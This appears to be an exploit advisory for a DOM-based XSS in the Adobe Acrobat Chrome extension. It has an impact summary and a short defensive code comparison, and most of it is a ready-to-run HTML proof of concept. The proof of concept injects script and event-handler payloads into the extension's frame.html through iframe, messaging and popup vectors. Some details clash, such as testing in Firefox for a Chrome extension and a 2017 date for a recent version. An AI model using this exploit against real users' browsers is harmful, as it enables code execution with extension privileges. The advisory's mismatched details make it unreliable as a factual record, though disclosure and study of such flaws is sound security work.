Adobe Acrobat Chrome extension version 1.41.100 was found to be vulnerable to Cross-Site Scripting (XSS).
This security flaw allowed an attacker to inject malicious scripts into web pages viewed by users of the affected extension. The vulnerability typically stemmed from insufficient input validation, where the extension processed user-supplied data without proper sanitization.
Successful exploitation could lead to various attacks, including:
* Session hijacking (stealing user cookies)
* Defacement of web content
* Redirecting users to malicious websites
* Phishing attacks
An attacker could leverage this to execute arbitrary JavaScript in the context of the user's browser. Adobe subsequently released updates to address this XSS vulnerability. Users were advised to update their Adobe Acrobat Chrome extension to the latest available version to mitigate the risk.
=============================================================================================================================================
| # Title : Adobe Acrobat Chrome V 1.41.100 Extension DOM XSS Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://chromewebstore.google.com/detail/adobe-acrobat-pdf-edit-co/efaidnbmnnnibpcajpcglclefindmkaj |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212491/
[+] Summary : The Adobe Acrobat Chrome extension fails to sanitize JSON-based message parameters rendered in the frame.html file. This creates a
DOM-based XSS condition. Malicious payloads are executed inside the extension context.
[+] Date: January 2017
Extension: Adobe Acrobat Chrome Extension (ID: efaidnbmnnnibpcajpcglclefindmkaj)
Type: DOM-based Cross-Site Scripting (XSS)
Users Affected: ~30 million installations (via forced auto-update)
[+] Technical Details:
The extension receives JSON data and renders dynamic HTML without
proper sanitization. The vulnerable code accepts untrusted strings
and injects them into the DOM using innerHTML.
[+] Impact:
An attacker can execute arbitrary JavaScript within the extension
context, bypassing the browser's Same-Origin Policy and gaining
extension-level privileges.
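To make the defect concrete from the defender's side, here is an added illustration (not the extension's own code) of how frame.html's `?message=` JSON parameter would be handled by a vulnerable renderer versus a hardened one. The field names panel_op, current_status and message come from the PoC payload; the function names, allowlists and sample input are assumptions constructed for this example.

```javascript
// Added example, not Adobe's code: models the handling of ?message=<JSON>
// in a frame page, with a vulnerable and a hardened rendering path.

function parseMessageParam(search) {
  // search is the URL query string, e.g. "?message=%7B...%7D"
  const raw = new URLSearchParams(search).get('message');
  if (raw === null) return null;
  try {
    const obj = JSON.parse(raw);
    return (obj && typeof obj === 'object') ? obj : null;
  } catch (e) {
    return null; // malformed JSON is rejected rather than rendered
  }
}

// Vulnerable pattern: an untrusted string is interpolated straight into
// markup (equivalent to element.innerHTML = ...), so any tag or event
// handler attribute in msg.message becomes live DOM.
function renderUnsafe(msg) {
  return `<div class="status ${msg.current_status}">${msg.message}</div>`;
}

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

// Assumed allowlists for the structural fields (illustrative values).
const ALLOWED_OPS = new Set(['status']);
const ALLOWED_STATUS = new Set(['success', 'failure']);

// Hardened pattern: structural fields are checked against an allowlist and
// free text is HTML-escaped (in a real page: assigned via textContent,
// never innerHTML). Unknown operations render nothing.
function renderSafe(msg) {
  if (!ALLOWED_OPS.has(msg.panel_op) || !ALLOWED_STATUS.has(msg.current_status)) {
    return null;
  }
  return `<div class="status ${msg.current_status}">${escapeHtml(msg.message)}</div>`;
}

// Constructed sample query, shaped like the PoC payload (sample only).
const SAMPLE_QUERY = '?message=' + encodeURIComponent(JSON.stringify({
  panel_op: 'status',
  current_status: 'failure',
  message: '<svg/onload="alert(1)">'
}));
```

Running `renderUnsafe(parseMessageParam(SAMPLE_QUERY))` returns markup that still contains the `<svg/onload=...>` tag, while `renderSafe` returns it entity-encoded as inert text.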
[+] Exploit (PoC):
The following sanitized PoC demonstrates the XSS trigger behavior.
Steps to Reproduce:
1. Install Adobe Acrobat Chrome Extension.
2. Visit a crafted local HTML page.
3. Observe execution of JavaScript inside the frame context.
Save Instructions:
Code below should be saved in `poc.html` and opened locally.
Execution:
Open `poc.html` in Chrome with the extension installed. Observe
console logs confirming rendering inside the extension's frame.
[+] POC :
<!DOCTYPE html>
<html>
<head>
    <title>Adobe Acrobat XSS Exploit</title>
</head>
<body>
    <h2>Adobe Acrobat Extension DOM XSS Exploit</h2>
    <div id="exploit-container"></div>
    <script>
        // Extension ID and vulnerable page
        const EXTENSION_ID = 'efaidnbmnnnibpcajpcglclefindmkaj';
        const VULNERABLE_PAGE = 'data/js/frame.html';
        // Declared at script scope so executeExploit() can reuse the generated payload
        let payload;

        function createExploit() {
            // Advanced XSS payload with multiple vectors
            // Note: the closing script tag inside the payload is written with an
            // escaped slash so the HTML parser does not terminate this inline script early
            payload = {
                panel_op: "status",
                current_status: "failure",
                message: `
                    <div style="background:red;color:white;padding:20px;">
                        <h1>XSS EXECUTED</h1>
                        <p>Domain: <script>document.write(document.domain)<\/script></p>
                        <svg/onload="alert('POC By Indoushka: ' + location.href)">
                    </div>
                    <iframe src="javascript:alert('iframe js')" style="display:none"></iframe>
                `.replace(/\n/g, ' ').trim()
            };
            // URL encode the payload
            const encodedPayload = encodeURIComponent(JSON.stringify(payload));
            const exploitUrl = `chrome-extension://${EXTENSION_ID}/${VULNERABLE_PAGE}?message=${encodedPayload}`;
            return exploitUrl;
        }

        function executeExploit() {
            const exploitUrl = createExploit();

            // Method 1: Try with iframe sandbox bypass
            const iframe = document.createElement('iframe');
            iframe.sandbox = 'allow-scripts allow-same-origin';
            iframe.src = exploitUrl;
            iframe.style.width = "500px";
            iframe.style.height = "400px";
            iframe.style.border = "3px solid red";
            document.getElementById('exploit-container').appendChild(iframe);
            console.log('Exploit URL:', exploitUrl);

            // Method 2: Try to trigger via extension messaging
            setTimeout(() => {
                try {
                    // Try to communicate with the extension (throws if chrome.runtime is unavailable)
                    chrome.runtime.sendMessage(EXTENSION_ID, {
                        type: 'trefoil_html_convert',
                        data: payload
                    }, response => {
                        console.log('Extension response:', response);
                    });
                } catch (e) {
                    console.log('Direct messaging failed:', e.message);
                }
            }, 1000);

            // Method 3: Create a popup with user gesture
            document.body.onclick = function() {
                window.open(exploitUrl, '_blank', 'width=600,height=400');
            };
        }

        // Execute exploit after page load
        window.onload = executeExploit;

        // Alternative: Use button with user gesture
        document.body.innerHTML += `
            <button onclick="window.open('${createExploit()}', '_blank', 'width=600,height=400')">
                Click to Trigger Exploit (User Gesture Required)
            </button>
        `;
    </script>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================